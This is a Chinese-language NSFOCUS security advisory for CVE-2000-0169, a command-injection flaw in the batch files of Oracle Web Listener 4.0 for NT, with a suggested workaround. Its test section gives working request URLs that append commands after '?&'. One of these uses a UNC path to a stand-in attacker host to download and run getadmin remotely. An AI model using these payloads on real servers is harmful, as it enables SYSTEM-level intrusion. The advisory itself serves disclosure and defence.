首页 -> 安全研究

安全研究

安全漏洞
Oracle Web Listener批处理文件可用来远程执行任意命令漏洞

发布日期:2000-03-15
更新日期:2000-03-15

受影响系统:
Oracle Web Listener 4.0.x for NT
    - Microsoft Windows NT 4.0
描述:
BUGTRAQ  ID: 1053
CVE(CAN) ID: CVE-2000-0169

Oracle WebServer是一个与Oracle7 Server紧密集成的HTTP服务器,能够由存储在Oracle数据库的数据建立动态HTML文件。Oracle Web Listener是其组件之一,接收使用任何浏览器的用户发出的请求。对于静态(基于文件的)页面请求被监听进程立即处理,其功能即是一个HTTP服务器。

Oracle Web Listener for NT在安装了OAS后,缺省设置下,/ows-bin目录(映射到C:\orant\ows\4.0\bin)下安装了一些批处理文件,这些文件能被攻击者用来在服务器上执行任意命令。

攻击者只需要在批处理文件的后面增加"?&"字符串,以及要执行的命令即可。这些命令将
在"SYSTEM"级别运行。攻击者甚至不需要知道确切的批处理文件的名称,用'*'通配符就可以匹配目录下所有的批处理文件。

另外,攻击者也可以用UNC(Universal Naming Conversion)路径(例如:\\attacker.com\getadmin.exe)下载并执行远程主机上的程序。

<*链接:http://www.cerberus-infosec.co.uk/advisories.shtml
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Cerberus Security Team 提供了如下测试方法:

http://target/ows-bin/perlidlc.bat?&dir
http://target/ows-bin/*.bat?&\\attacker\getadmin.bat

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 删除或者禁用ows-bin目录。

厂商补丁:

Oracle
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.oracle.com

浏览次数:7577
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障